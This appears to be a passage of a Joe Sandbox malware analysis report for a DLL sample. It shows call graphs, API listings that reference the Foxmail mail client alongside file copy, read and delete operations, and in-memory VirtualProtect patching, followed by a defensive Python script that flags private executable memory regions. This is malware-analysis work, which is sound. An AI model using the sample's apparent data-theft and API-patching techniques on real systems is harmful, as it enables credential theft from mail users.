API calls 6052->6053 6052->6056 6054 1000357a 6053->6054 6054->6056 6057 1000544d 6054->6057 6056->6050 6058 1000545a 6057->6058 
6059 10005468 6057->6059 6058->6059 6064 1000547f 6058->6064 6060 10006368 _free 20 API calls 6059->6060 6061 10005470 6060->6061 6066 100062ac 6061->6066 6063 1000547a 6063->6056 6064->6063 6065 10006368 _free 20 API calls 6064->6065 6065->6061 6069 10006231 6066->6069 6068 100062b8 6068->6063 6070 10005b7a _free 20 API calls 6069->6070 6071 10006247 6070->6071 6072 10006255 6071->6072 6073 100062a6 6071->6073 6078 10002ada _ValidateLocalCookies 5 API calls 6072->6078 6080 100062bc IsProcessorFeaturePresent 6073->6080 6075 100062ab 6076 10006231 ___std_exception_copy 26 API calls 6075->6076 6077 100062b8 6076->6077 6077->6068 6079 1000627c 6078->6079 6079->6068 6081 100062c7 6080->6081 6084 100060e2 6081->6084 6085 100060fe ___scrt_fastfail 6084->6085 6086 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6085->6086 6088 100061fb ___scrt_fastfail 6086->6088 6087 10002ada _ValidateLocalCookies 5 API calls 6089 10006219 GetCurrentProcess TerminateProcess 6087->6089 6088->6087 6089->6075 7589 100021a1 ___scrt_dllmain_exception_filter 6090 10009c23 6091 10009c56 6090->6091 6092 10009c28 6090->6092 6128 10009728 6091->6128 6094 10009c46 6092->6094 6095 10009c2d 6092->6095 6120 100098f5 6094->6120 6096 10009ccd 6095->6096 6113 10009807 6095->6113 6099 10006368 _free 20 API calls 6096->6099 6105 10009cc0 6096->6105 6101 10009cf2 6099->6101 6100 10009bf2 6100->6096 6104 10009ca9 6100->6104 6100->6105 6102 10006355 __dosmaperr 20 API calls 6101->6102 6102->6105 6103 10002ada _ValidateLocalCookies 5 API calls 6106 10009d15 6103->6106 6107 10009cb0 6104->6107 6108 10009cc4 6104->6108 6105->6103 6110 10006368 _free 20 API calls 6107->6110 6138 10006332 6108->6138 6111 10009cb5 6110->6111 6135 10006355 6111->6135 6115 10009816 6113->6115 6114 100098d8 6117 10002ada _ValidateLocalCookies 5 API calls 6114->6117 6115->6114 6116 10009894 WriteFile 6115->6116 6116->6115 6118 100098da GetLastError 6116->6118 6119 100098f1 6117->6119 6118->6114 
6119->6100 6121 10009904 6120->6121 6122 10009a0f 6121->6122 6125 10009986 WideCharToMultiByte 6121->6125 6127 100099bb WriteFile 6121->6127 6123 10002ada _ValidateLocalCookies 5 API calls 6122->6123 6124 10009a1e 6123->6124 6124->6100 6126 10009a07 GetLastError 6125->6126 6125->6127 6126->6122 6127->6121 6127->6126 6133 10009737 6128->6133 6129 100097ea 6130 10002ada _ValidateLocalCookies 5 API calls 6129->6130 6134 10009803 6130->6134 6131 100097a9 WriteFile 6132 100097ec GetLastError 6131->6132 6131->6133 6132->6129 6133->6129 6133->6131 6134->6100 6136 10005b7a _free 20 API calls 6135->6136 6137 1000635a 6136->6137 6137->6105 6139 10006355 __dosmaperr 20 API calls 6138->6139 6140 1000633d _free 6139->6140 6141 10006368 _free 20 API calls 6140->6141 6142 10006350 6141->6142 6142->6105 5764 1000c7a7 5765 1000c7be 5764->5765 5769 1000c82c 5764->5769 5765->5769 5776 1000c7e6 GetModuleHandleA 5765->5776 5767 1000c835 GetModuleHandleA 5770 1000c83f 5767->5770 5768 1000c872 5769->5767 5769->5768 5769->5770 5770->5769 5771 1000c85f GetProcAddress 5770->5771 5771->5769 5772 1000c7dd 5772->5769 5772->5770 5773 1000c800 GetProcAddress 5772->5773 5773->5769 5774 1000c80d VirtualProtect 5773->5774 5774->5769 5775 1000c81c VirtualProtect 5774->5775 5775->5769 5777 1000c82c 5776->5777 5778 1000c7ef 5776->5778 5781 1000c872 5777->5781 5782 1000c835 GetModuleHandleA 5777->5782 5783 1000c83f 5777->5783 5788 1000c803 GetProcAddress 5778->5788 5780 1000c7f4 5780->5777 5784 1000c800 GetProcAddress 5780->5784 5782->5783 5783->5777 5783->5783 5787 1000c85f GetProcAddress 5783->5787 5784->5777 5785 1000c80d VirtualProtect 5784->5785 5785->5777 5786 1000c81c VirtualProtect 5785->5786 5786->5777 5787->5777 5789 1000c82c 5788->5789 5790 1000c80d VirtualProtect 5788->5790 5792 1000c872 5789->5792 5793 1000c835 GetModuleHandleA 5789->5793 5790->5789 5791 1000c81c VirtualProtect 5790->5791 5791->5789 5795 1000c83f 5793->5795 5794 1000c85f GetProcAddress 5794->5795 5795->5789 5795->5794 7590 
10009fa7 7591 10006368 _free 20 API calls 7590->7591 7592 10009fac 7591->7592 6143 1000742b 6144 10007430 6143->6144 6146 10007453 6144->6146 6147 10008bae 6144->6147 6148 10008bdd 6147->6148 6149 10008bbb 6147->6149 6148->6144 6150 10008bd7 6149->6150 6151 10008bc9 RtlDeleteCriticalSection 6149->6151 6152 1000571e _free 20 API calls 6150->6152 6151->6150 6151->6151 6152->6148 6937 100060ac 6938 100060dd 6937->6938 6940 100060b7 6937->6940 6939 100060c7 FreeLibrary 6939->6940 6940->6938 6940->6939 6941 1000aeac 6942 1000aeb5 6941->6942 6943 10008cc1 21 API calls 6942->6943 6944 1000aebb 6943->6944 6945 10006332 __dosmaperr 20 API calls 6944->6945 6946 1000aedd 6944->6946 6945->6946 6153 10005630 6154 1000563b 6153->6154 6156 10005664 6154->6156 6158 10005660 6154->6158 6159 10005eb7 6154->6159 6166 10005688 6156->6166 6160 10005c45 _abort 5 API calls 6159->6160 6161 10005ede 6160->6161 6162 10005efc InitializeCriticalSectionAndSpinCount 6161->6162 6163 10005ee7 6161->6163 6162->6163 6164 10002ada _ValidateLocalCookies 5 API calls 6163->6164 6165 10005f13 6164->6165 6165->6154 6167 100056b4 6166->6167 6168 10005695 6166->6168 6167->6158 6169 1000569f RtlDeleteCriticalSection 6168->6169 6169->6167 6169->6169 6951 100096b2 6958 10008dbc 6951->6958 6953 100096c2 6954 100096c7 6953->6954 6955 10005af6 _abort 38 API calls 6953->6955 6956 100096ea 6955->6956 6956->6954 6957 10009708 GetConsoleMode 6956->6957 6957->6954 6959 10008dc9 6958->6959 6960 10008dd6 6958->6960 6961 10006368 _free 20 API calls 6959->6961 6963 10008de2 6960->6963 6964 10006368 _free 20 API calls 6960->6964 6962 10008dce 6961->6962 6962->6953 6963->6953 6965 10008e03 6964->6965 6966 100062ac ___std_exception_copy 26 API calls 6965->6966 6966->6962 6967 10003eb3 6968 10005411 38 API calls 6967->6968 6969 10003ebb 6968->6969 7193 10008b34 7194 1000637b _abort 20 API calls 7193->7194 7195 10008b46 7194->7195 7197 10005eb7 11 API calls 7195->7197 7199 10008b53 7195->7199 7196 1000571e _free 20 API calls 
7198 10008ba5 7196->7198 7197->7195 7199->7196 7200 10009b3c 7201 10006355 __dosmaperr 20 API calls 7200->7201 7202 10009b44 7201->7202 7203 10006368 _free 20 API calls 7202->7203 7204 10009b4b 7203->7204 7205 100062ac ___std_exception_copy 26 API calls 7204->7205 7206 10009b56 7205->7206 7207 10002ada _ValidateLocalCookies 5 API calls 7206->7207 7208 10009d15 7207->7208 6170 1000543d 6171 10005440 6170->6171 6174 100055a8 6171->6174 6185 10007613 6174->6185 6177 100055b8 6179 100055c2 IsProcessorFeaturePresent 6177->6179 6180 100055e0 6177->6180 6181 100055cd 6179->6181 6215 10004bc1 6180->6215 6183 100060e2 _abort 8 API calls 6181->6183 6183->6180 6218 10007581 6185->6218 6188 1000766e 6189 1000767a _abort 6188->6189 6190 10005b7a _free 20 API calls 6189->6190 6194 100076a7 _abort 6189->6194 6196 100076a1 _abort 6189->6196 6190->6196 6191 100076f3 6192 10006368 _free 20 API calls 6191->6192 6193 100076f8 6192->6193 6197 100062ac ___std_exception_copy 26 API calls 6193->6197 6200 1000771f 6194->6200 6232 10005671 RtlEnterCriticalSection 6194->6232 6196->6191 6196->6194 6214 100076d6 6196->6214 6197->6214 6201 1000777e 6200->6201 6203 10007776 6200->6203 6211 100077a9 6200->6211 6233 100056b9 RtlLeaveCriticalSection 6200->6233 6201->6211 6234 10007665 6201->6234 6206 10004bc1 _abort 28 API calls 6203->6206 6206->6201 6210 10007665 _abort 38 API calls 6210->6211 6237 1000782e 6211->6237 6212 1000780c 6213 10005af6 _abort 38 API calls 6212->6213 6212->6214 6213->6214 6261 1000bdc9 6214->6261 6265 1000499b 6215->6265 6221 10007527 6218->6221 6220 100055ad 6220->6177 6220->6188 6222 10007533 ___scrt_is_nonwritable_in_current_image 6221->6222 6227 10005671 RtlEnterCriticalSection 6222->6227 6224 10007541 6228 10007575 6224->6228 6226 10007568 _abort 6226->6220 6227->6224 6231 100056b9 RtlLeaveCriticalSection 6228->6231 6230 1000757f 6230->6226 6231->6230 6232->6200 6233->6203 6235 10005af6 _abort 38 API calls 6234->6235 6236 1000766a 6235->6236 6236->6210 6238 10007834 
[Execution graph export, flattened to text. Joe Sandbox's call graph for the module at image base 0x10000000 (it has dllmain_crt_process_attach / dllmain_crt_process_detach nodes), written as node records "<id> <address> <resolved symbols>" and edges "<id>-><id>"; collapsed subgraphs appear as "<n> API calls". The bulk of the nodes are CRT start-up, TLS and critical-section housekeeping (RtlEnterCriticalSection/RtlLeaveCriticalSection, TlsAlloc/TlsGetValue/TlsSetValue/TlsFree, RtlAllocateHeap/HeapFree, GetLastError/SetLastError, IsProcessorFeaturePresent, IsDebuggerPresent and SetUnhandledExceptionFilter on the __scrt_fastfail abort path). The non-runtime Win32 calls annotated in the graph are: GetEnvironmentVariableW and GetEnvironmentStringsW; FindFirstFileW/FindNextFileW/FindClose and GetFileAttributesW with lstrlenW/lstrcatW path building; CopyFileW, CreateFileW, GetFileSize, ReadFile, DeleteFileW and CloseHandle in one chain rooted at 0x10001cca; GetModuleFileNameA, LoadLibraryExW, GetProcAddress, GetModuleHandleW/GetModuleHandleExW and FreeLibrary; WriteFile, WriteConsoleW, GetConsoleCP, GetStdHandle/SetStdHandle, GetFileType and GetStartupInfoW; GetCurrentProcess/TerminateProcess, ExitProcess and RaiseException.]
__startOneArgErrorHandling 20 API calls 6678->6681 6692 100078a3 6679->6692 6684 1000b95d 6681->6684 6683 1000b8b2 __startOneArgErrorHandling 20 API calls 6683->6684 6684->6669 6686 1000b8d4 6685->6686 6687 1000b8bf 6685->6687 6689 10006368 _free 20 API calls 6686->6689 6688 1000b8d9 6687->6688 6690 10006368 _free 20 API calls 6687->6690 6688->6669 6689->6688 6691 1000b8cc 6690->6691 6691->6669 6693 100078cb 6692->6693 6694 10002ada _ValidateLocalCookies 5 API calls 6693->6694 6695 100078e8 6694->6695 6695->6683 6695->6684 7721 100085eb 7725 1000853a 7721->7725 7722 1000854f 7723 10006368 _free 20 API calls 7722->7723 7724 10008554 7722->7724 7726 1000857a 7723->7726 7725->7722 7725->7724 7728 1000858b 7725->7728 7727 100062ac ___std_exception_copy 26 API calls 7726->7727 7727->7724 7728->7724 7729 10006368 _free 20 API calls 7728->7729 7729->7726 7730 100065ec 7735 100067bf 7730->7735 7733 1000571e _free 20 API calls 7734 100065ff 7733->7734 7740 100067f4 7735->7740 7738 100065f6 7738->7733 7739 1000571e _free 20 API calls 7739->7738 7741 10006806 7740->7741 7750 100067cd 7740->7750 7742 10006836 7741->7742 7743 1000680b 7741->7743 7742->7750 7751 100071d6 7742->7751 7744 1000637b _abort 20 API calls 7743->7744 7745 10006814 7744->7745 7747 1000571e _free 20 API calls 7745->7747 7747->7750 7748 10006851 7749 1000571e _free 20 API calls 7748->7749 7749->7750 7750->7738 7750->7739 7752 100071e1 7751->7752 7753 10007209 7752->7753 7754 100071fa 7752->7754 7755 10007218 7753->7755 7760 10008a98 7753->7760 7756 10006368 _free 20 API calls 7754->7756 7767 10008acb 7755->7767 7758 100071ff ___scrt_fastfail 7756->7758 7758->7748 7761 10008aa3 7760->7761 7762 10008ab8 RtlSizeHeap 7760->7762 7763 10006368 _free 20 API calls 7761->7763 7762->7755 7764 10008aa8 7763->7764 7765 100062ac ___std_exception_copy 26 API calls 7764->7765 7766 10008ab3 7765->7766 7766->7755 7768 10008ae3 7767->7768 7769 10008ad8 7767->7769 7771 10008aeb 7768->7771 7777 10008af4 _abort 7768->7777 7770 
100056d0 21 API calls 7769->7770 7775 10008ae0 7770->7775 7772 1000571e _free 20 API calls 7771->7772 7772->7775 7773 10008af9 7776 10006368 _free 20 API calls 7773->7776 7774 10008b1e RtlReAllocateHeap 7774->7775 7774->7777 7775->7758 7776->7775 7777->7773 7777->7774 7778 1000474f _abort 7 API calls 7777->7778 7778->7777 6696 10008c6e 6699 100056b9 RtlLeaveCriticalSection 6696->6699 6698 10008c79 6699->6698 6700 1000506f 6701 10005081 6700->6701 6702 10005087 6700->6702 6704 10005000 6701->6704 6705 1000502a 6704->6705 6706 1000500d 6704->6706 6705->6702 6707 10005024 6706->6707 6708 1000571e _free 20 API calls 6706->6708 6709 1000571e _free 20 API calls 6707->6709 6708->6706 6709->6705 7556 10003370 7567 10003330 7556->7567 7568 10003342 7567->7568 7569 1000334f 7567->7569 7570 10002ada _ValidateLocalCookies 5 API calls 7568->7570 7570->7569 6710 10009e71 6711 10009e95 6710->6711 6713 10009ee6 6711->6713 6716 10009f71 __startOneArgErrorHandling 6711->6716 6712 10009ef8 6713->6712 6718 1000aa53 6713->6718 6714 1000acad __startOneArgErrorHandling 6716->6714 6717 1000b2f0 21 API calls 6716->6717 6717->6714 6719 1000aa70 RtlDecodePointer 6718->6719 6720 1000aa80 6718->6720 6719->6720 6721 1000ab0d 6720->6721 6724 1000ab02 6720->6724 6726 1000aab7 6720->6726 6721->6724 6725 10006368 _free 20 API calls 6721->6725 6722 10002ada _ValidateLocalCookies 5 API calls 6723 1000ac67 6722->6723 6723->6712 6724->6722 6725->6724 6726->6724 6727 10006368 _free 20 API calls 6726->6727 6727->6724 6728 10008c72 6729 10008c79 6728->6729 6731 100056b9 RtlLeaveCriticalSection 6728->6731 6731->6729 7783 10005bff 7791 10005d5c 7783->7791 7786 10005b7a _free 20 API calls 7788 10005c1b 7786->7788 7787 10005c28 7788->7787 7789 10005c2b 11 API calls 7788->7789 7790 10005c13 7789->7790 7792 10005c45 _abort 5 API calls 7791->7792 7793 10005d83 7792->7793 7794 10005d9b TlsAlloc 7793->7794 7797 10005d8c 7793->7797 7794->7797 7795 10002ada _ValidateLocalCookies 5 API calls 7796 10005c09 7795->7796 
7796->7786 7796->7790 7797->7795

Control-flow Graph (image not reproduced)

APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
• lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
• FindClose.KERNEL32(00000000), ref: 100011DB
Memory Dump Source
• Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_10000000_graias.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
• Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
• Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
• Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

Control-flow Graph (image not reproduced)

APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
  • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
• lstrlenW.KERNEL32(?), ref: 100014C5
• lstrlenW.KERNEL32(?), ref: 100014E0
• lstrlenW.KERNEL32(?,?), ref: 1000150F
• lstrcatW.KERNEL32(00000000), ref: 10001521
• lstrlenW.KERNEL32(?,?), ref: 10001547
• lstrcatW.KERNEL32(00000000), ref: 10001553
• lstrlenW.KERNEL32(?,?), ref: 10001579
• lstrcatW.KERNEL32(00000000), ref: 10001585
• lstrlenW.KERNEL32(?,?), ref: 100015AB
• lstrcatW.KERNEL32(00000000), ref: 100015B7
Strings
Memory Dump Source
• Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_10000000_graias.jbxd
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
• Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
• Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
• Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

Control-flow Graph (image not reproduced)

APIs
• GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
  • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
Memory Dump Source
• Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_10000000_graias.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
• Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

Control-flow Graph
control_flow_graph 79 1000c7a7-1000c7bc 80 1000c82d 79->80 81 1000c7be-1000c7c6 79->81 83 1000c82f-1000c833 80->83 81->80 82 1000c7c8-1000c7f6 call 1000c7e6 81->82 91 1000c7f8 82->91 92 1000c86c-1000c86e 82->92 85 1000c872 call 1000c877 83->85 86 1000c835-1000c83d GetModuleHandleA 83->86 89 1000c83f-1000c847 86->89 89->89 90 1000c849-1000c84c 89->90 90->83 93 1000c84e-1000c850 90->93 96 1000c7fa-1000c7fe 91->96 97 1000c85b-1000c85e 91->97 94 1000c870 92->94 95 1000c866-1000c86b 92->95 98 1000c852-1000c854 93->98 99 1000c856-1000c85a 93->99 102 1000c865 96->102 103 1000c800-1000c80b GetProcAddress 96->103 100 1000c85f-1000c860 GetProcAddress 97->100 98->100 99->97 100->102 102->95 103->80 104 1000c80d-1000c81a VirtualProtect 103->104 105 1000c82c 104->105 106 1000c81c-1000c82a VirtualProtect 104->106 105->80 106->105
APIs
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
  • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
Memory Dump Source
• Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_10000000_graias.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
• Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
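The three .sdmp names under Memory Dump Source carry the region's base address and its page protection, state and type, which is the first thing to check on a dump taken at 0x10000000: the code pages are 0x40 (PAGE_EXECUTE_READWRITE), the header page at the image base is 0x04 (PAGE_READWRITE), and all three are type 0x20000 (MEM_PRIVATE) rather than MEM_IMAGE, i.e. a PE that was written into memory rather than mapped by the loader. The decoder below is an added example and not part of the Joe Sandbox report. The field order it assumes (pid, stage, dump id, base, protection, state, type, sequence) is inferred from the names on this page and is an assumption; the constant values are the documented winnt.h ones.

```python
"""Decode the dotted fields of the .sdmp file names listed under Memory Dump Source.

Added example, not part of the Joe Sandbox report. Assumption: a name is
<pid>.<stage>.<dump id>.<base>.<protection>.<state>.<type>.<sequence>.sdmp with the
address and the three region attributes in hexadecimal. The constant values below are
the documented winnt.h ones.
"""
import re
from dataclasses import dataclass
from typing import List

PAGE_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
STATE_NAMES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
TYPE_NAMES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
MEM_COMMIT, MEM_IMAGE = 0x1000, 0x1000000

# The three names from this report entry (copied from the report, not constructed).
REPORT_DUMP_NAMES = [
    "00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp",
    "00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp",
    "00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp",
]

# Assumed field order; `search` is used so a whole "Source File: ..." report line also parses.
_SDMP = re.compile(
    r"(?P<pid>[0-9a-f]+)\.(?P<stage>[0-9a-f]+)\.(?P<dump>\d+)\.(?P<base>[0-9a-f]+)\."
    r"(?P<prot>[0-9a-f]+)\.(?P<state>[0-9a-f]+)\.(?P<type>[0-9a-f]+)\.(?P<seq>[0-9a-f]+)\.sdmp\b",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    base: int
    protect: int
    state: int
    mem_type: int

    @property
    def base_protect(self) -> int:
        return self.protect & 0xFF          # drop PAGE_GUARD / NOCACHE / WRITECOMBINE modifiers

    @property
    def executable(self) -> bool:
        return bool(self.base_protect & 0xF0)   # any PAGE_EXECUTE* value

    @property
    def writable(self) -> bool:
        return bool(self.base_protect & 0xCC)   # READWRITE / WRITECOPY, with or without EXECUTE

    def describe(self) -> str:
        return "pid %d base %08x %s %s %s" % (
            self.pid, self.base,
            PAGE_NAMES.get(self.base_protect, hex(self.protect)),
            STATE_NAMES.get(self.state, hex(self.state)),
            TYPE_NAMES.get(self.mem_type, hex(self.mem_type)),
        )


def parse_sdmp(name_or_line: str) -> DumpRegion:
    m = _SDMP.search(name_or_line)
    if m is None:
        raise ValueError("no .sdmp name in %r" % name_or_line)
    return DumpRegion(
        pid=int(m.group("pid"), 16),
        base=int(m.group("base"), 16),
        protect=int(m.group("prot"), 16),
        state=int(m.group("state"), 16),
        mem_type=int(m.group("type"), 16),
    )


def assess(regions: List[DumpRegion], image_base: int) -> List[str]:
    """The checks an analyst makes first on a dump like this one: committed memory that is
    private (not a loader-mapped MEM_IMAGE) yet both writable and executable, and a PE
    header sitting at the image base inside such private memory."""
    findings = []
    for r in regions:
        if r.mem_type == MEM_IMAGE or r.state != MEM_COMMIT:
            continue
        if r.executable and r.writable:
            findings.append("%08x: private RWX region, typical of a manually mapped or unpacked module" % r.base)
        if r.base == image_base:
            findings.append("%08x: PE header at the image base lives in private memory, not a loader-mapped image" % r.base)
    return findings


if __name__ == "__main__":
    regions = [parse_sdmp(n) for n in REPORT_DUMP_NAMES]
    for r in regions:
        print(r.describe())
    for finding in assess(regions, image_base=0x10000000):
        print("!", finding)
```

The image base passed to `assess` is the `Offset: 10000000` value the report prints next to the source file; on a loader-mapped DLL the same region would show type MEM_IMAGE and the code pages would not be writable.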

Control-flow Graph
control_flow_graph 107 1000c803-1000c80b GetProcAddress 108 1000c82d 107->108 109 1000c80d-1000c81a VirtualProtect 107->109 112 1000c82f-1000c833 108->112 110 1000c82c 109->110 111 1000c81c-1000c82a VirtualProtect 109->111 110->108 111->110 113 1000c872 call 1000c877 112->113 114 1000c835-1000c83d GetModuleHandleA 112->114 116 1000c83f-1000c847 114->116 116->116 117 1000c849-1000c84c 116->117 117->112 118 1000c84e-1000c850 117->118 119 1000c852-1000c854 118->119 120 1000c856-1000c85e 118->120 121 1000c85f-1000c865 GetProcAddress 119->121 120->121 124 1000c866-1000c86e 121->124 126 1000c870 124->126 126->117
APIs
• GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
• VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
• VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
Memory Dump Source
• Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_10000000_graias.jbxd
Similarity
• API ID: AddressProcProtectVirtual$HandleModule
• String ID:
• API String ID: 2152742572-0
• Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
• Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
• Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
• Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
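The two entries above (1000c7a7, and 1000c803, which covers a sub-range of the first and shares its API references 1000C804, 1000C816, 1000C82A, 1000C838 and 1000C860) show the same shape: GetModuleHandleA and GetProcAddress resolve an export, VirtualProtect sets 0x78 bytes at an address the report could not resolve ("?") to 0x4 (PAGE_READWRITE), and a second VirtualProtect follows whose third argument is also unresolved but in this pattern is normally the protection saved by the first call. That is the shape of code that patches a resolved API in place (hooking or unhooking), so it is useful to search the report's control_flow_graph listings for that ordered call sequence instead of eyeballing them. The parser and search below are an added example, not code from the report or from the sample; the edge-list grammar is inferred from the two listings above (an assumption), and the two edge-list strings are copied from them verbatim.

```python
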